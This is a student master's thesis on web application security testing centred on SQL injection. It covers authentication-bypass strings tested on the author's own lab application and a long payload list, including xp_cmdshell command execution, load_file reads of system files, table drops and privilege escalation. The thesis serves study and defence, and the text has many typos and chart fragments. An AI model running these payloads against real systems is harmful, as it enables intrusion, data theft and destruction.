Security Testing on Web Application
Krishnan Kannoorpatti, Sami Azam
School of Engineering and IT
Faculty of EHSE
Charles Darwin University
The writing of this thesis has been one of the most important part in my Software
Engineering course. I woluld express sincere thanks to my supervisors Krishnan Kannooraptti and Sami Azam for their constant support and guidance.I woluold like to say special thanks to my unit coordinator Mirjam Jonkman, my course coordinator Charles Yeo, Technical officer Balaji Iyyaswamy and Librarian Bandana Koirala for their all support and giving their precious time to finish this thesis.
NAME: Tausif Yunusbhai Aghariya
COURSE TITLE: Master Of Information Technology
SPECIALISATION: Software Engineering
THESIS TITLE: Security Testing on Web Application
THESIS SUPERVISOR: Krishnan Kannoorpatti, Sami Azam
Approach towards most web-applications were ad-hoc, thus arose a need to raise security standards as it requires much efforts to maintain in meeting its quality standards. With existing and new technologies like ASP, VB scripts, CGI, it's quite hard enough task to assess the quality of web because of the factors that influence the performance of the website. With data all over the place and with users having no minimal knowledge on how to protect their data, the dark side of technology always tried to devise its own path and is now posing a serious threat to web security with new set of computer security vulnerabilities, SQL injection and cross-site scripting (XSS). Though there were some exploits such as buffer overflow, these SQL-Injections and cross-site scripting vulnerabilities are instances of the broader class of input validation, which are a result of changing business requirements. These input validation-based vulnerabilities therefore require fundamentally new techniques to characterize and mitigate them. This dissert focuses on how efficiently can we deal with these web security vulnerabilities , thus addressing active issues primarily with SQL injection attacks. Further we will bisect the field of web applications to understand vulnerable domains and will focus on the approach which could be followed to address the exploits which could occur due to vulnerabilities and the approach or methodologies which we can use to give proper security to the web applciation.
Keywords: Web Application, web application vulnaribilities, Security Testing, Methods of security testing on web application.
(Attach a digital photo, JPEG format)
5 Problem Statement:
Vulnerabilities are still major security issues in web application and cause many exploits
Reason for Problem:
However, there are so many reasons for vulnerabilities are still present in web application. As I mention above categories, now a day’s developers try to add more and more functionality in the web application. That means developers need to write more code for the app and that creates infinite coding errors and more opportunity for vulnerable codes. The security testing methodologies and process of web application came on early 2001. So, developers are not getting sufficient security testing training. Moreover they are giving less priority on risk analysis. These are the reasons which I considered based on my research why vulnerabilities are still present in the web application.
6 Proposed Solution:
The preferable solution for this problem is maintain the security standard of the web application by using suitable security testing methodologies and try to give proper security for predictable vulnerabilities in web application.
Overview of the Report:
This report mainly divided in to the four phases. First phase includes the introduction of the web application, how’s web application work and its architecture, why security is necessary for web application and most prevailed vulnerabilities of the web application.
Second phase explained about SQL Injection attack which is world second highest attack technique on the web application. It includes how the SQl Injection works, types of SQL Injection and practical implemented in one BCS web application, hack the whole database of the web application by using SQL Injection technique.
Now from the third phase onwards, its starts to explain about the security testing practice, current situation for security testing approach, how different methodologies are available to use security testing process in development of web application, how’s Australian security standards are set for web application and by using the security testing process how we can save the BCS web application which we hack perniciously by using SQL injection.
Tested Web Application:
The installation of vulnerable web application guided by my supervisors, however I established lab in CDU with the permission of IT department. I established my own server and domain in to the lab. And I install BSC PREDICTION web application for my SQL injection methods for testing. I used that lab for my all testing and thesis related work. The example vulnerable code is help full to illustrates the SQL injection vulnerability. The analysis is clearly visualized that the variable id is not filtered hence any of the input can pass through it to the application. The given code is taken from my own application.
7 Table of Contents
1. Introduction on Web technology: ...10
2. Web application and its components: ...11
2.1 Database layer: ...12
2.2 Operational layer: ...12
2.3 User Interface layer: ...12
3. Security needs for Web Application: ...13
3.1 Financial motivated attacks: ...15
3.2 Ideology Driven Attacks: ...16
3.3 Attack-Discory and Timeline: ...16
3.4 Top 10 Incidents discoveries on financial motivated attacks ...17
4. Most prevailed vulnerabilities of Webapplication security: ...20
5. SQL Injection Attack ...23
5.1 SQLI Bypass Authentication Attack: ...25
5.2 Types of SQL Injection: ...32
5.2.1 Simple SQL injection Attacks(Ping-Chen,2011):... 33
5.2.2 Sql Injection InMySql By using URL method ... 33
5.2.3 Sql Injection InMySqlBy Blind Injection Method: ... 44
6. History of web application security fields and practice ...50
7. web security with software engineering with design...52
7.1 Security Requirements – ...53
7.2 Secure Application Design and threat modelling - ...53
7.3 Develop with Secure Coding- ...54
7.4 Application Security Testing- ...54
8. Standards of the Australian web security ...54
8.1 Content Security Policy ...55
8.2 HTTP Strict Transport Security ...55
8.3 Cookie Security Enhancements ...56
8.4 Input validation requirements standers ...56
9. Current situation for security testing of web application ...57
10. Methodologies for securing web applications ...60
10.1 Agile security testing ...61
10.3 Open Web Application Security Project (OWASP) ...64
11. Prevention for SQL injection attack ...67
12. Preventationof SQL injection attacks by using Filters and techniques: ...70
12.1 SQL DOM: ...71
12.3 Input Validation...71
12.4 Session Management: ...71
12.5 prevent Injection in MySql by using URL method attack: ...72
13. Analysis of web application code ...72
13.1 By Static Code Analysis with Polyspace Code Verifiers ...72
13.2 Measuring Code Complexity and Checking with Coding Standards ...73
13.3 Proving the Presence of Errors ...73
13.4 Performing Impact Analysis ...74
13.5 URL method for prevention of SQL Injection: ...74
14. Conclusion ...83
9 List of Abbreviations
SQL Structure Query Language
XSS Cross Site Cripting
CGI Common Gateway Interface
HTML Hyper Text Markup Language
HTTP Hyper Text Transfer Protocol
HTTPS Hyper Text Transfer Protocol with Secure socket layer
UI Layer User Interface Layer
URL Uniform Resource Locator
CSS Casceding Style Sheet
OWASP Open Web application security project
SDLC Security Development Life Cycle
MD5 Message Digest 5
API Application Programming Interface
XML Extencible Markup Language
UML Unified Modeling Language
SSL Secreate Socket Layer
ERP Entireprise Resource Planning
HSTC History of Science and Technology
10 1. Introduction on Web technology:
Gone are those days where web is all about static pages ( Html introduced to be static, as there were no form & input tags hence forth HTTP dint come up with a post method) with a very limited to nothing for user’s as the interaction. It all started in the year 1993 where The MOSIAC browser released extended adhoc features like lists, nested lists, added pictures, fill-out forms, etc., but received lot of uncertainties as it was not designed properly(Tajpour, Ibrahim&Sharifi,2012). In the same year Common Gateway Interface (CGI) was designed which “dynamically generate HTML server-side scripts” on the given input. Then within no time the Netscape 2.0 came up with Java Scripting and made the world know the wonders of it and it still helping us in taking the technology to the next level(Rothke,2003). Microsoft in 1997 changed the face of World Wide Web by presenting Iframes in internet Explorer which lead to new revolutions in enhancing the browser technology by loading the data asynchronously and immediately Microsoft has pushed “XMLHTTP” interface on the release of IE5(Curphey& Arawo,2006). Slowly this technology picked up by other browsers which followed with “XMLHttpRequest”. The new millennium 2000, Web application took a new phase with Web application frameworks (Web 2.0, which allowed user to do more than just information retrieving) got introduced and the new era begun, we call it the fundamental step because Web 2.0 has created a platform for creating web –aware applications with high interactivity and user centric(Ben-Natan, 2005). Without Web 2.0 Internet would have been extremely different to present day, there would be no E-commerce (such as EBay, Flip kart, Amazon), web mails, internet messaging, Internet banking, international share trading, forums, web communities (Twitter). With the advent of Web 2.0 greater than before information sharing through networking communities and growing market in adoption of the web into business and delivery as a service, websites are often attacked directly as they stand as the face of business(Bierman, Meijer&Schulte, 2005).
Figure- Web Application History (Owasp.org.au, 2015)
The present day web is completely embraced with millions of small, medium & Large scale businesses as an economical medium to communicate and exchange information with prospects and transactions with clients, partners and anyone in that matter. If we take a look at the current situation Large web apps are being developed and this have become unmanageable with messes of jQuery and the application backend code, leading flaws into the application(Alanazi&Sarrab, 2011).
2. Web application and its components:
It can be defined as highly programmed environment which can take and allow mass customization through the immediate deployment of a larger and diverse range of application, to billions across the globe. From past 10 years (or more), web has been playing a vital role in many of the business transactions(Cross, & Books24x7,2007). Undoubtedly, it has been whole heartedly accepted by millions of people/businesses and it has become an inexpensive channel to communicate and exchange information.
In fact, Web provides a channel through which marketers can sell their products by advertising, analysing the number of people visiting their sites and communicating with them. People now a days are getting their work done sitting right in front of their computer/Mobile and no wonder that the reason behind this is the 'Web application(s)'(Doupé, Cova&Vigna,2010). All the data regarding the transactions or may be any other should be fetched, processed and stored somehow for further use and this data can be retrieved through the web applications in the enquiry or the login forms. Common Examples of Web
applications include Web mails, Online banking/Shopping sites, Google docs, Gaming sites etc(Antunes, Laranjeiro, Vieira,&Madeira,2009).
A Web application generally comprises of the following 3 layers:
The DATABASE layer ( Model) : This is where the entire information gets stored.
The OPERATIONAL layer( Controller) : This is where the logic behind the application is written.
The UI layer (View) : This is the interface through which user(s) interacts.
It is used to store the entire information. This layer is an internal interface and not exposed to the user. The DB access related calls are not made directly to the storage engine, instead, all the DB access is routed through the DB layer. All the data will be structured into objects and these objects in turn are stored in the form of tables and the attributes of an object are stored as columnsin the Database.
The Database layer is responsible for Fetching ,Creating , Updating and Deleting(CRUD operations) Individual Records, attributes and values within records. All the DB vendors provide their own interface tailored to their products, which leaves it to the application programmer to implement code for all the Database interfaces he or she would like to support. Some of the Database vendors include Oracle,SQL Server, My SQL,DB2, PostgresQL.
This is the layer where the application related business logic is defined. It is solely responsible for handling user requests and rendering responses within stipulated time with the aid of DB & UI layers. Operational layer can be treated as a manager who ensures that all the resources needed for completing a task are delegated to proper layers. It also waits for the requests from clients, authenticates it, delegates data fetching or processing to the model, Selects the data that is to be presented to the client and finally delegates rendering process to the UI layer. Some implementations of this layer include PHP,Perl,ASP.
2.3User Interface layer:
This is the interface where the User interaction happens. Whenever a user raises a request based on controller actions the data is retrieved from the underlying DB and rendered to the HTML page or the UI for the user to consume. This layer is not limited to HTML or any text representation of data but also can deliver wide variety of formats such as Pictures,
documents, Videos and any other format the user asks for. This layer makes use of the technologies like HTML, CSS, Java script (its frame works) and many more.
Figure: Architecture of web application (Antunes, Laranjeiro, Vieira,&Madeira,2009)
Finally, Web applications can be defined as the computer programs which allow users to retrieve or submit data from (to) a database using a preferred web browser. Though there are many advantages of Web applications, one significant advantage is that they are platform independent. Web apps can be quickly deployed anywhere at no cost and no installation is required at user's end.
It's also quite important to understand that web application generally work over the http protocol, where http functions as a "request-response" protocol in the client-server protocol. A connection is established in the form of sessions, so called http sessions refers to a customized HTTP Cookie to associate a certain amount of information with the client. This cookie termed as Session Hash and is encrypted with a common practice to store users/clients access information.
3. Security needs for Web Application:
There's no doubt about it, with diverse techniques available to attackers made defending web applications a herculean task. SANS Institute rates " That Internet-facing Web sites that are vulnerable to attack as the second highest cyber security risk to enterprises"(Bayles, A.W. & Books24x7,2007).Web applications are now meant for cost-effective business solutions and are proved doing easy business. For the same reason they are widely used across all sectors
which includes business, banking, finance, education, healthcare and technology among others(Bayles, A.W. & Books24x7,2007). Threats over the internet are so poised that nothing over the web is considered to be safe. Online services in integration with web applications had grown at a very brisk pace with a very minimal to no attention on the security which lead many number of corporate sites vulnerable to attacks.
websites and Web applications facing towards the internet are low hanging fruits for the attackers as these applications handle so much of data which includes personal identifiable information or private data of the Organization and its clients, many prominent organizations have fallen prey for hackers because they invest too much on the network security and little over web application security which is all most like "We buy good doors when the problem is with windows"(Fong, Gaucher&Okun,2008). A security breach can put everything at stake. It damage trust of a customer, Reputation, Revenues and can also lead to legal liabilities. A website functionality is purely dependent on its web applications. These applications are programmed to capture, process, transmit & storage of personal and confidential information such as banking details, SSN, medical history. The other side of attacks is not to steal the data present in the database servers of the applications but to change the trusted websites into malicious websites for client side exploits (Razzaq, Hur, Farooq & Masood,2012).
WhiteHat Sentinel, an Organization that assesses largest e-commerce, healthcare and technology service firms. There security statistics report confirmed that 83% of the websites are prone to at least one severe vulnerability(Fonseca, Vieira&Madeira,2007).
Web Applications will remain as punch bags of the internet. They are compromised in any of the two ways either by exploiting weakness in the application or by using impersonating with stolen credentials(McClure&Krüger,2005).
Verizon's DBIR suggests that 3,937 incidents are been recorded out of which 490 are confirmed data disclosure. Every two out of three attacks are somehow driven by the ideology and lulz of the activistsgroups, Under one of envy three implied to financial
motivated attackers with intension of espionage.
3.1Financial motivated attacks:
Every Informational asset will and would have some value and its called as hack value for the attackers, Financial driven attacks are meant for gaining access to money, and for the same reason financial and retail organisations stand in as their prime scope because the data is meant to be money(Shelly,2010).If it’s a financial industry/Organization the attacks will be majorly towards gaining access to the web application as this drives us in gaining logical access to the money. This means the user credentials and a single factor authentication achieves the desired result to the attacker. In order to steal the credentials there might be many known and reported tactics but the usual tactics which we come across are as follows(McClure& Krüger,2005):
- Phishing techniques – tricks the user to supply the credentials, or by installing some malwares to steal the credentials.
- One among the oldest methods was password guessing attempts using Brute force techniques
- And with the rarest among all and requires skill to perform, is directly targeting the application using SQL Injections in that matter application level attacks or attacking the user management system itself for seeking user-credentials to bypass the authentication.
Retails industry suffers with majority of attacks aimed for Payment card information with 95% of the total reported incidents were on stealing the Payment card
0% 10% 20% 30% 40% 50% 60% 70%
Espionage Financial Idealogy/Fun
EXternal Attacker Motives over Web-App Attacks (McClure & Kruger, 2005)
information(Morgan,2006). This information is often easily accessible by simply exploiting any web application or stealing the saved credentials. Social engineering has also played and still playing its effective role as this family of attacks works pretty well enough. SQL injection dominance in web applications still continues with retail industry leveraging to 80% which is followed by techniques to install shells for local file inclusions(LFI), remote file inclusions(RFI) with 7%(Meier& Meier,2006).
3.2Ideology Driven Attacks:
These attacks represent the identified motives in attacking web applications with attackers based out of different geographical locations. Majority of the attacks are focused on true exploiting of the targets(Simpson, Backman& Corley,2012).
The attacks are driven by different reasons but the Ideological attackers are very less concerned about getting the business data. It’s anticipated to see attacks majorly over defacement and to send a message or hijacking the server to attack others, which can even lead to cyber extortions. The webservers were the only assets targeted in most of the Ideology motivated attacks(Sarasan ,2013).
3.3Attack-Discory and Timeline:
Within financially motivated attacks the discovery can be recorded and the attack notification reported by the Customer itself, perhaps customer is the one to notice such fraudulent activity prior to anyone else. Below are the graphs for showing “Discovery Timeline with respect to Attacks”(Manuel Costa, Miguel Castro, Zhou, Zhang&Peinado,2007).
17 3.4Top 10 Incidents discoveries on financial motivated attacks
Top 5 attack discovery methods representing Incidents based on ideologically base Web application Attacks(Fonseca, Vieira&Madeira,2007).
WEB-APPLICATION ATTACK CHART (Owasp.org.au, 2015)Total External Attacks Total Internal Attacks
1% 1% 2% 2% 2% 2% 3% 4% 6% 74% 0% 10% 20% 30% 40% 50% 60% 70% 80% External - audit External - monitor service External - Law enforcement Internal - frausd detection Internal - Reported by end user External - Attacker disclosure External - unrealted party Internal - IT audit External - fraud detection External -Customer
Attack Notification (Owasp.org.au, 2015)
External - audit External - monitor service
External - Law enforcement Internal - frausd detection
Internal - Reported by end user External - Attacker disclosure
External - unrealted party Internal - IT audit
Figure: (Owasp.org.au, 2015)
WEB-APPLICATION ATTACK CHART (Owasp.org.au, 2015)
Total External Attacks Total Internal Attacks
19% 42% 12% 23% 0% 5% 0% 0% Seconds Minutes Hours Days Weeks Months Years Never
19 Figure: (Owasp.or.au, 2015) 3% 27% 21% 21% 18% 9% 0% 0% Seconds Minutes Hours Days Weeks Months Years Never
Exfilteration(n=33)Exfilteration(n=33) 0% 3% 11% 17% 16% 41% 11% 0% Seconds Minutes Hours Days Weeks Months Years Never
4. Most prevailed vulnerabilities of Webapplication security:
"What we need is more secure web application not just more security enabled application. The most important task in any industry is to identify the vulnerabilities before an attacker does and provide appropriate measures to safe guard the application and reputation of the organization from any attacks(Insight Security Research (NISR) publication , 2002). Not only discovering the vulnerabilities but also estimating the associated risks to business is also equally important. there might be any security assessment methodologies used by the Organizations in the development life-cycle of the application we might even find security concerns in design or architecture or might even be with the framework(Insight Security Research (NISR) publication , 2002). At the later stage where they may find security related issues with secure code review or by application security testing(Penetration testing). Or security weakness may not be identified even after its release and compromised. According to White Hat sentinel in correlation to a survey conducted for 76 Organization across different industries, the result suggests that the software security contorls and the software development lifecycle behaviours with respect to the vulnerability outcomes and with breaches reported are quite complicated to draw any conclusion(Tajpour, Ibrahim& Sharifi,2012).
Reports like Verizon data breachreport, OWASP Top 10, WhiteHAtSentinal, Symantec Threat report or essentially any other report in that context focus on identifying most severe
0% 2% 5% 42% 22% 29% 0% 0% Seconds Minutes Hours Days Weeks Months Years Never
risks for the Organization in different business areas. Any risk will be evaluate based on Security controls, threat agents and business impact of the organization. Business impacts are considered to be Application/Business Specific and Threat Agents are Application specific and these are dependent on the details of the application in repsect to the enterprise(Oehlert,2005).According to the Web application security reports 2014 almost all the reports concluded in listing the same on the Risks associated with Attacks over web applications, the top 10 attack types have been and listed based on the attack type and its impact on the business(Howard, LeBlanc&Viega,2010).
TOP 10 Attacks Description
Injection-Methods These Flaws occur when un-trusted data is passed to trick the interpreter as a query in order to execute a command or a query which can help attacker in granting access to the data without any proper authorization.
Broken-Authentication and Session- management
Application functionalities fail to address the core areas like authentication and session management wherein allowing the attackers to break in and compromise the session cookies, tokens, passwords or any keys to exploit and steal the identities.
Cross -Site Scripting (XSS) These are specially crafted scripts which are accepted by the flawed applications and sends the un-trusted data through the web browser without a proper validation. Cross site Scripting (XSS) helps attackers in executing scripts in the victim's web browser which has capacity to hijack victim’s sessions, websites defacements or url directs the victims to malicious sites.
These are the instances where the developers expose a reference to an internal implementation object which can be a file or a directory or might can even be a database key. This happens if there is no proper access controls or other ways of protection. These flaws allows attackers to manipulate references in accessing unauthorized data. Securit-Misconfiguration Security can only be achieved with proper security
applications with robust security configurations similarly for frameworks, servers on which the applications are going to be installed and associated web servers and database servers. As default setting stand to be insecure a proper security settings are to be defined, implemented and to be maintained. Above all updated.
Sensitive-Data-Exposure Most of the present day web-apps are handling Corporate/Private/Personnel data which is considered to be sensitive and might not have a proper security controls enforced. This allows attackers to steal the data for identity thefts, credit card frauds to name a few.
Missing Function Level Access Control
Web applications undergo functionality tests right before making full-fledged functional User Interface, on the other hand there is also a need to perform the access control checks on the server while the functions are getting accessed. If the requests re not thoroughly verified attackers will have a chance to break in with forge requests in order to access the functionality compromising the authorization.
Cross-site Request Forgery(CSRF)
A CSRF attack forces an application logged victim to execute some unwanted actions like sending forged “HTTP requests”, which includes victim’s session related information like session cookies and any other authentication information to vulnerable web application. Attackers can force the victim’s web browsers to create requestswhere these requests tricks the vulnerable application as legitimate requests from the end-user.
Using of components with existing Vulnerabilities
Usage of external libraries or frameworks or any software module in application development can enhance the functionality and features but also enhances the chances of getting vulnerable. When a vulnerable component gets exploited, it can aid an attackers with data theft or
application takeovers. If vulnerable components are used in building an application will enable the application for wide range of attacks with associated business impact. Malicious Redirects and
Present day web applications are subjected to url redirects while determining the destination web pages. With no proper validations in place Attackers are redirecting the users to for their phishing sites or using web page forwarding for unauthorised access of authorized pages.
5. SQL Injection Attack
Web applications had become more urbane and increasingly complex with its architechture. There existence has given a new dimension to e-commerce, ERP industry and its cleanly visble today as we are standing as end-users of these applications. With the availability of these enterprise systems and the sensitive data they store, handle and process had become critical to all major industry sectors not only for ecommerce industry(Bayles, A.W. & Books24x7,2007).
SQL injections attacks are from the familyof Injection attacks.The term SQL is generally pronounced as sequel and stands for structured query language, and used in specifically querying the database(Antunes, Vieira,2009).. These are considered to be the most common application layer attack that aremultifaceted and dominant. These attacks are only possible if the target applications have back-end databasewith improper coding and no proper control over input validation. On successful exploitation of these weakness will allow the attacker in Reading, Modifying(Insert-Update-Delete) sensitive data and has the capacity to provide administration access to the database where operations like shutting down the database, owning the data base is possible(Cross, & Books24x7,2007). Due to ubiquity of SQL across different platforms and databases this attack had found to be portable. In order to carry out these family of attacks one should have immense knowledge on Client server Technologies, Web applications, databases and also patience(Portland,2013).
Below is the table provided by Razzaq, Hur, Farooq& Masood in 2012 which is explaining about the attacking vactors and impacts of the SQL Injection attack.
Threat-Agents Attacking vectors Security- weaknesses (Prevalence & Technical Impacts Business Impacts
Detectability ) Applications Easily
Common Moderate Severe Application/Busin ess Specific Every data which is given as input is considered to be untrusted, including internal/external clients or admins Hackers sends specially crafted text that tricks the interpreter. Irrespective source ofdata the which can even come from Internal sources
Injections attacks arise when a web application passes an crafted data to the interpreter. These flaws are quite common most cited with legacy code implementations. It’s hard to discover via testing the functionality but can easily identified with code examination. With present day available scanners it has become easy to detect these injection flaws
This Leads in losing the ownership of the machine as these flaws on successful exploitation has the ability to provide amin access to the attacker.
All data upon the access can be stolen, modified and can even be corrupted. Which ultimately keeps reputation at stake.
Attacks which use SQL injection targets those websites or web-applications which allows to submit data and retrieve the data from the databases over the internet. Databases are playing a vital role in the functioning of modern day websites or web-applications as they store the data required for the web sites or applications to render its services by providing appropriate content to its authorized customers, stakeholders and employees(Cross, & Books24x7,2007). Data associated to end-user credentials, banking information, companies’ proprietary information may reside in the database and can be accessed by authorised users via customized or off-the-shelf applications.
SQL injection attacks are performed by crafted SQL codes which are appended or inserted into the web application as user input parameters which tricks the interperter and and executes itself in the form of queries to the database. Any system that constructs the SQL Queries might be vulnerable, SQL as a language for specifically constructing queries to the databases will provide a diversified coding options(Dharam, Shiva,2014).
Based on the application functioning and processing of user-supplied-data, SQL injection attacks can be used to perform the following types of attacks(Doupé, Cova&Vigna,2010):
Authentication Bypassing:using this attack, an attacker logs onto an application without providing valid username and password, gains administrator privileges.
Information Disclosure: Using the attacks, an attacker can obtain sensitive information that is stored in the database.
Compromised Data Integrity: An attacker uses this attack to deface a website / webpage, insert malicious content into web pages, or alter the contents of a database.
Compromised Availability of data: Attackers use this attack to delete the database information, delete log, or audit information that is contained in a database.
Remote Code Execution: It allows an attacker to compromise the host operating system. Example of a small basic SQL vulnerability:
Let's consider an example of a web application which is hosted by a bookstore to make there service available to the customers online.
5.1SQLI Bypass Authentication Attack:
As customers search for all books in the store published by some publisher XYZ, the application will perform the below query(Shar&Tan,2013):
Select Author, Book_name, published_year from bookstore where publisher = 'XYZ'
Let's consider if a customer searches for books that are published by T'XYZ. Then application performs the below query.
Select Author, Book_name, published_year from bookstore where publisher = T'XYZ
Incorrect Syntax Server Error msg
Unclosed Quotation mark before the character string
Note: When application is subjected to bejave this wasy, then we can say this application is open for SQLi attacks.
This flaw allows an attacker to manipulate the query in way where it can retrieve information of every book present in the bookstore, by using the below string:
XYZ' or 1=1--
Let’s insert the above crafted string into the Query for an unprecedented output:
SELECT Author, Book_name, Published_year from bookstore where publisher = 'XYZ' or 1=1--'
As it's a known fact that 1always equals to 1, permits the database to retrive every book present in the table - bookstore.
Note: "--" (double hyphen) in SQL means to tell the interpreter to ignore the rest of the line after it as it is a comment. But with MySQL there shoulbe be a space or "#" after "--" to specify as a comment.
In certain instances, a very small and simple SQL injection flaw might have an immediate crtical level impact. Most of the applications are running with form-based-login function, it uses a database to store the user's authentication information (Credentials) and performs a SQL query to verify each login attempt made by the user. Below a small example of a query on the same:
SELECT * from users where username = 'JOHN' and passwd = 'NHOJ'
An attacker can inject his crafted request either in the username text-field or in the password text-field to alter the query for his own requirement. Let's assume for instance if the attacker have knowledge about the administrator username of the application as "administrator". Now that he knows the user name he can log in as admin just by supplying any password and username as follwoing:
By inserting "admin" in the query the query seems to be as following: select * from users where username = 'admin'--' AND passwd = 'abcdef'
With the comment symbol before the password, the execution of validating the password has been bypassed.
Now if the attacker is unaware of the administrator's username. The following might help anttacker to gain the access.
- Normally in most of the application, the first account in the database will be of Admin user, as this account will be used to create other accounts in the application.
- Further, if the submitted query retrieves an output with more than one user, many applications will simply process the details of the first user.
An attacker can frequently exploit to log in to the applciation as the first user of the database by passing the following string in the query as username:
' OR 1=1--
This allows the applcaition to perform the following query
SELECT * from users where username = " OR 1=1--' AND password = 'abcde'
- In most of the cases, SQL injection vulnerability may be identified and verified just by passing a single un-trusted input into the application.
Below are the snap shots of the testing which I did in my lab on BCS web application which developed by me and I used that web application for testing.
user fills out the login form like this: Login: ' OR ''='
Password: ' OR ''='
This will give SQLQuery the following value:
SELECT Username FROM Users WHERE Username = '' OR ''='' AND Password = '' OR ''='‘
Instead of comparing the user-supplied data with that present in the Users table, the query compares '' (nothing) to '' (nothing), which, of course, will always return true.
We can see in snap shot I fill user name as ' OR ''=' and password as ‘ OR”=’. Instead of comparing the user-supplied data with that present in the Users table, the query compares '' (nothing) to '' (nothing), which, of course, will always return true. You can see in below snap shot user can enter in the main page with the use of bypass authorization methods of SQl injection.
-There even may be instances where flaws can be very subtle and can make things hard in distinguishing other categories of vulnerabilities or from small security weakness that do not pose any threat(Cross, & Books24x7,2007).
Note: With applications accessing the back-end database, it quite important to verify URL parameters, POST functions implemented by application, HTTP Headers, Cookies.
Attack characters Description
' or " character string indicators
-- or # Single line comment
/*...*/ Multiple line comment
?parmeter1=xyz&Parameter2=123 URL Parameters
PRINT Will be useful as non transactional command
@variable Local variable
@@variable Global variable
In order to successfully exploit any SQL injection vulnerability itsnecessary to break the quotes. as the end user passed input data gets incorporated in the form of SQL command and the input will be placed in single quotes(Cross, & Books24x7,2007).
Detect SQL Injection Issues: Try passing a single quote as an unexpected character input and observe if any error, or the result is in any other way to know where exactly the user given input is not sanitized.
If there is an error or a strange behaviour observed, pass second single quote meaning two single quotes together. It's a known fact that databases use couple of single quotes as an escape sequence. But the here it got interpreted as the string in between the single quotes and not as the closing string terminator. And now if the result is error free or the strange behaviour gets disappeared, then yes the application is most likely vulnerable to injection attacks(Anley,2007).
To conclude the existence of the injection flaws, the SQL concatenating characters to craft a string. If the application responds the crafted input with the expected output, then the application is said to be vulnerable. Every database use its own method in string concatenation.
Detect Input Sanitization:
Usage of "right-square-bracket "(the ] character) as an input character in verifying the instances on where exactly the given input is getting used as SQL identifier without any sanitization.
Detecting Truncation Issues:
Pass lengthy strings of unexpected data into the application in a way we submit the input to check for any instance of buffer overflows. These actions may throw SQL errors on the page if they are vulnerable.
Database type String Concatenation characters
MySQL ' '(Space between two single quotation marks)
- To confirm whether the application is accessing the database is by using "%"(A wildcard character) in the input.
- Submitting wildcard character - % in the search field will often produce many results, which indicated that a SQL query got executed in the associated database.
Testing for SQL Injection Weakness(Mirdula&Manivannan,2013):
Testing String Variations
' Single code 1' or '1'='1 1') or ('1'=1 Value' or '1'='2 Value') or ('1'='2 1' and '1'='2 1') and ('1'='2 1' or 'ab'='a'+'b 1') or ('ab'='a'+'b 1' or 'ab'='a''b 1') or ('ab'='a''b 1' or 'ab'='a'||'b 1') or ('ab'='a'||'b
Testing String Variations
';[SQL query];-- ');[SQL query];-- ';[SQL query];# ');[SQL query];# ;[SQL query];-- );[SQL query];--
;[SQL query];# );[SQL query];#
TEsting String Variations
'; droptable users-- 1+1 3-1 Value+0 1 or 1=1 1) or (1=1 Value or 1=2 Value) or (1=2 1 and 1=2 1) and (1=2 1 or 'ab'='a'+'b' 1) or ('ab'='a'+'b' 1 or 'ab'='a''b' 1) or ('ab'='a''b' 1 or 'ab'='a'||'b' 1) or ('ab'='a'||'b'
Testing String Variations
1 or 1=1-- 1) or 1=1--
' or '1'='1'-- ')or '1'='1'--
Testing String Variations
-1 and 1=2-- -1) and 1=2--
' and '1'='2'-- ') and '1'='2-- 1/*...*/
||6 or 1=1-- %22+or+isnull%281%2F0%29+%2F* '||'6 " or "a"="a ' group by userid having 1=1--
(||6) Admin' OR ' '; Execute immediate 'SEL' || 'ECT US' || 'ER'
' OR 1=1-- ' having 1 = 1-- CRATE USER name IDENTIFIED BY 'pass123'
OR 1=1 ' OR 'text' = N'text' 'union select 1, load_file('/etc/password'),1,1,1;
' OR '1'='1 ' OR 2 > 1 ';exec master..xp_cmdshell 'ping 10.10.1.2'
; OR '1'='1' ' OR 'text' > 't' ';exec sp_addsrvrolemember 'name' ,'sysadmin'
%27+--+ ' union select GRANT CONNECT TO name; GRANT RESOURCE TO name " or 1=1-- Password: */=1-- ' union select * from users where login
= char(114,111,111,116) ' or 1=1 /* ' or 1/*
'/**/OR/**/1/**/=/** /1 UNI/**/ON SELECT
' or 1 in (select @@version)-- ';EXEC ('SEL' + 'ECT US' +'ER') ' union all select @@version +or+isnull%281%2F0%29+%2F*
' OR 'unusual' = 'unusual' ' and 1 in (select var from temp)-- ' OR 'something' = 'some'+'thing' '; drop table temp--
' OR 'something' like 'some%' Exec sp_addlogin 'name','password' ' OR 'whatever' in ('whatever') @var select @var as var into temp end-- ' OR 2 BETWEEN 1 and 3
' or username like char(37)
5.2Types of SQL Injection:
Figure: Types of SQL Injection Attack (Ping-Chen,2011)
33 5.2.1 Simple SQL injection Attacks(Ping-Chen,2011):
5.2.2 Sql Injection InMySql By using URL method
Generally attacker may perform his attack for testing vulnerability by passing quote as an input if application return with an error massage then it may be consider that web application is vulnerable to SQL Injection (Sutton, Greene& Amini,2007). Error massage varies and depends on the type of database so it may possible that you may get different error in different web application. Finding a SQL Injection Vulnerability before launching a SQL injection attack, the hacker determines whether the configuration of the database and related tables and variables is vulnerable. The steps to determine the SQL Server’s vulnerability are as follows (Naresh, Soujanya, Yugandhar&Rao ,2011):
1. Using your web browser, search for a website that uses a login page or other database input or query fields (such as an “I forgot my password” form). Look for web pages that display the POST or GET HTML commands by checking the site’s source code. 2. Test the SQL Server using single quotes (‘’). Doing so indicates whether the user input variable is sanitized or interpreted literally by the server. If the server responds with an error message that says use
•"UNION SELECT" statement returns the union of the intended dataset with the target dataset.
•Eg: select Name, Phone, Address from Users where id=1 UNION ALL SELECT creditcard
System Stored Procedure
•Attackers exploit database's stored procedures to perpetrate their attacks
End if line Comment
•After injecting the crafted code into a specific field, legitimate code that follows is nullified through usage of end of line comments
•Eg: select * from user where name = 'xyz' and userid IS NULL; --';
•Injecting statements that are always true so that queries always return upon evaluation of a WHERE condition
•Eg: SELECT * FROM users WHERE name = ' ' OR '1'='1';
Illegal/Logically Incorrect Query
•An attacker may gain knowledge by injecting illegal/logically incorrect requests such as injectable parameters, data types, names of tables etc.
'a'='a' (or something similar), then it’s most likely susceptible to a SQL injection attack(Cross ,2007).
3. Use the SELECT command to retrieve data from the database or the INSERT command to add information to the database.
For this thesis, I used my own application which I developed for during my academic project. The name of the application is BSC( Buy Cut Save) PREDICTION. It is an application which provides information to the customers for giving meat order. So, based on that order butcher can see the all orders of the customers and he can put more meat items in the web application. So by using Mysql injection by using UML method , I dump the all personal customers information such as email, contact, company name, etc. Even also I can dump the all database and get the butcher information as well. So, the all following tests done on local host server with this application.
220.127.116.11Adding Malicious Characters
